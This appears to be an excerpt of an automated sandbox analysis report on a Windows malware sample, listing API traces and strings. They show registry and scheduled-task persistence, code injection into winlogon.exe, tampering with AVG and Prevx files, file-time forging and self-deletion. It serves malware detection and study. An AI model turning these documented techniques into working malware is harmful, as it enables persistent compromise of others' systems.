Fri Jun 17 05:52:09 20111, xrefs: 00402BDF, 00402BFB
%s_, xrefs: 00402ADE
\apppatch\, xrefs: 004029EF

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
String ID: %s_$.dat$Fri Jun 17 05:52:09 20111$IsWow64Process$\apppatch\$kernel32.dll$svchost.exe
API String ID: 4049655197-4201755136
Opcode ID: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
Instruction ID: 2b42465635bf5f89377a844675b664ed4d82d183fb77d3ed61f84ac94699b08c
Opcode Fuzzy Hash: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
Instruction Fuzzy Hash: A5718FB15143419BC310EF70DE8896B7BE9BBC8300B54493EF686B72A1D778D944CB99

Function 00402420 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
CloseHandle.KERNEL32(00000000), ref: 00402547

Strings

\PrevxCSI\csidb.csi, xrefs: 0040245A

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: File$PointerWrite$CloseCreateFolderHandlePath
String ID: \PrevxCSI\csidb.csi
API String ID: 606440919-2829233815
Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9

Function 00402810 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
PathAddBackslashA.SHLWAPI(?), ref: 00402873
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
_snprintf.MSVCRT ref: 004028AB
RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
RegFlushKey.ADVAPI32(00000000), ref: 0040292D
RegCloseKey.ADVAPI32(00000000), ref: 00402937

Strings

software\microsoft\windows\currentversion\run, xrefs: 004028F0
userinit, xrefs: 00402918
SystemDrive, xrefs: 00402861
software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 3547530944-2324515132
Opcode ID: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
Instruction ID: 580de61d93956de76c260b8cd85b43503f34d02da1fa31da69fbe3ce3aace33d
Opcode Fuzzy Hash: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
Instruction Fuzzy Hash: 0F3166B5740305BBE720DB909D4AFEA777CDB95B00F208155FB44BA1D0D6F4AA448BA8

Function 004013C0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004013D8
memset.MSVCRT ref: 004013FE
lstrcpynA.KERNEL32(?,00402BDF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401416
CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401439
GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040145A
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401467
GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040147E
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040148B

Strings

D, xrefs: 00401432

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
String ID: D
API String ID: 2248944234-2746444292
Opcode ID: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
Instruction ID: 09676c1f46593a06cd44afd8140421a4ba04e6465ccbd83babddadcd264a60ad
Opcode Fuzzy Hash: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
Instruction Fuzzy Hash: 862165B1A002196FDB10DFE4DD85AEF7BBCAB44354F00817AFA08F6291D6349A448BB5

Function 00401B60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401B85
GetFileTime.KERNEL32(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?,?,?), ref: 00401B9F
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401BB5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401BC6
CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402B87,?), ref: 00401BE2
SetFileTime.KERNELBASE(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?), ref: 00401BF8
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401C0E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401C1F

Strings

\\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401B80

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateInformationTime
String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
API String ID: 1046229350-2760794270
Opcode ID: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
Instruction ID: 5c288fe5b10a83830543158496eb663db1d1ba801f64cc380cadfe311b19cddd
Opcode Fuzzy Hash: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
Instruction Fuzzy Hash: 3721D7725402187BE7219B90DD09FEFBB7CAF84710F108225FF11761D0E774964586A8

Function 004011C0 Relevance: 13.6, APIs: 9, Instructions: 66
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(00401C30,?,0000001C), ref: 004011EF
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401205
PathFileExistsA.KERNELBASE(?), ref: 00401212
GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401229
GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401241
MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040125D
SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040126C
DeleteFileA.KERNELBASE(?), ref: 00401279
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040128D

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
String ID:
API String ID: 2787354276-0
Opcode ID: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
Instruction ID: 6fb89bbc187d80a5bc5b9bf27070627c8da11026cf83192134f00bca91ba5049
Opcode Fuzzy Hash: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
Instruction Fuzzy Hash: 7C21FCB1900219AFDB50DBA0DD49FEA77BCAB48700F4045A9E705F6190E7B49A54CFA4

Function 00401000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00402B5B,00000000), ref: 0040102A
WriteFile.KERNELBASE(00000000,[+@,?,00000000,00000000,?,?,00402B5B,00000000), ref: 00401045
SetEndOfFile.KERNELBASE(00000000,?,?,00402B5B,00000000), ref: 00401050
GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040106F
CloseHandle.KERNELBASE(00000000), ref: 00401080

Strings

[+@, xrefs: 00401037, 00401040

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateInformationWrite
String ID: [+@
API String ID: 1150544999-2667881658
Opcode ID: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
Instruction ID: c834b12cbe40c0e9b10b40bca9c4cb852a2dca9cf30c5b09766062945076e325
Opcode Fuzzy Hash: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
Instruction Fuzzy Hash: 0311E971600244B7E7205B65DD08FAB765DDBC1790F048236FF84F62E0D7758D8082B8

Function 00402330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
MoveFileA.KERNEL32(?,?), ref: 0040240F

Strings

\AVG\AVG9\dfmcfg.dat, xrefs: 004023CC
\AVG\AVG9\dfncfg.dat, xrefs: 00402388

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: FileFolderMovePath
String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
API String ID: 1404575960-1083204512
Opcode ID: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
Instruction ID: 218ec206f196096905059f0fa712dce574fe6e09d85f3a618a89c2f21692c038
Opcode Fuzzy Hash: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
Instruction Fuzzy Hash: 43214FB45043448FC759CF14EA98B92BBF4BF98300F1581FADA89A73A2D774D944CB98

Function 0040207A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000), ref: 0040208C

Strings

V,@, xrefs: 00402092

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: V,@
API String ID: 3664257935-3634209070
Opcode ID: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
Instruction ID: d15e959a12f23ccec2fe85088e2afbb8a6d817ea7d7d5b015e5417604cfff27a
Opcode Fuzzy Hash: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
Instruction Fuzzy Hash: 12D05E76E027298BCB20CF94A5052AEF730FB44731F0043AADE257338083351C118AD4

Non-executed Functions

Function 00403440 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040348E
memset.MSVCRT ref: 004034AE
memset.MSVCRT ref: 004034CE
IsUserAnAdmin.SHELL32 ref: 004034D6
GetVersionExA.KERNEL32 ref: 004034F1

Part of subcall function 004033A0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
Part of subcall function 004033A0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
Part of subcall function 004033A0: OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
Part of subcall function 004033A0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
Part of subcall function 004033A0: CloseHandle.KERNEL32(00000000), ref: 00403427

GetTickCount.KERNEL32 ref: 00403535
_snwprintf.MSVCRT ref: 0040354E
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
memset.MSVCRT ref: 00403616
_snwprintf.MSVCRT ref: 00403630
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E

Strings

\\?\globalroot\systemroot\system32\tasks\, xrefs: 00403477
00-->, xrefs: 0040371F
task%d, xrefs: 0040353C
p=Dv, xrefs: 0040382B
<Actions , xrefs: 004036EA
<Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403454

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=Dv$task%d
API String ID: 1601901853-2684908384
Opcode ID: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
Instruction ID: fd62d51515435fe7aa577a9a46339635c431e4e957a39cb3738b378977d63dce
Opcode Fuzzy Hash: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
Instruction Fuzzy Hash: C5D1E0B2504301ABC720EF64CC48B5B7BA8EFC8751F048669FA45A72D1E774EA04CB99

Function 004017F0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040181B
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
HeapAlloc.KERNEL32(00000000), ref: 00401860
memset.MSVCRT ref: 00401873
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
HeapAlloc.KERNEL32(00000000), ref: 004018CD
memset.MSVCRT ref: 004018DD
MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
HeapAlloc.KERNEL32(00000000), ref: 0040193A
memset.MSVCRT ref: 0040194A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
HeapValidate.KERNEL32(00000000), ref: 004019B6
GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
HeapFree.KERNEL32(00000000), ref: 004019C5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
HeapValidate.KERNEL32(00000000), ref: 004019D5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
HeapFree.KERNEL32(00000000), ref: 004019E1
GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
HeapValidate.KERNEL32(00000000), ref: 004019F4
GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
HeapFree.KERNEL32(00000000), ref: 00401A04

Strings

D, xrefs: 00401994

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
String ID: D
API String ID: 3422789474-2746444292
Opcode ID: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
Instruction ID: 7aa473d0462345c53030a0d843d553fe9ec79da9d6527bb3e9654a4a16b7ec1b
Opcode Fuzzy Hash: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
Instruction Fuzzy Hash: 4A6195B1A01215BBDB209FA58C45FAF7B6CEF84751F15422AFE14B72D0CA749D00CAA8

Function 00401580 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9

Sleep.KERNEL32(00000064,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015AD
OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015CC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
memcpy.MSVCRT(00000000,?,?), ref: 004016E8
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401711
WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
GetHandleInformation.KERNEL32(00000000), ref: 0040177E
CloseHandle.KERNEL32(00000000), ref: 0040178F
RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
GetHandleInformation.KERNEL32(00000000), ref: 004017CC
CloseHandle.KERNEL32(00000000), ref: 004017DD

Strings

kernel32.dll, xrefs: 004015DF, 0040161C
IsWow64Process, xrefs: 004015FB, 00401632

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 3542510048-3024904723
Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC

Function 00401C70 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401C96
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
GetLastError.KERNEL32 ref: 00401CB0
SwitchToThread.KERNEL32 ref: 00401CBF
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
CloseHandle.KERNEL32(00000000), ref: 00401CF9
Module32First.KERNEL32(00000000,?), ref: 00401D1A
StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
Module32Next.KERNEL32(00000000,00000224), ref: 00401D56

Strings

kernel, xrefs: 00401D30
.dll, xrefs: 00401D42

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
String ID: .dll$kernel
API String ID: 2979424695-2375045364
Opcode ID: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
Instruction ID: 6b572b3e0c1d36d44cadbb52a12c0b3f1dd55c4915d11e4f0b3c307bdf2881c5
Opcode Fuzzy Hash: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
Instruction Fuzzy Hash: EC21B972A0111467D7109BA5AD49B9E77A8EF89720F100276EA04F32E0EB34DD4556A9

Function 004033A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
CloseHandle.KERNEL32(00000000), ref: 00403427

Strings

\\?\globalroot\systemroot\system32\tasks\, xrefs: 004033A9

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
String ID: \\?\globalroot\systemroot\system32\tasks\
API String ID: 4133869067-1576788796
Opcode ID: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
Instruction ID: 021f6ab0fc676138f4263539a703c8a5ee641fdd4e06072bb68a67a5c5d36617
Opcode Fuzzy Hash: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
Instruction Fuzzy Hash: 4E0188B5E00208EBEB20CFA0DD09B9A7BBCAB85701F4040A5E709B6280D6749F44CF75

Function 00422380 Relevance: .8, Instructions: 833COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
Instruction ID: a443a6be7b6020440c066dd6ac9f13e6f3c101328c6206cdfb6017cdb3c45d4c
Opcode Fuzzy Hash: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
Instruction Fuzzy Hash: 406217302042629FE715DF349EA8AAB7BE5EF9A300F44C959E885C7331DB74C909C799

Function 0044599D Relevance: .8, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

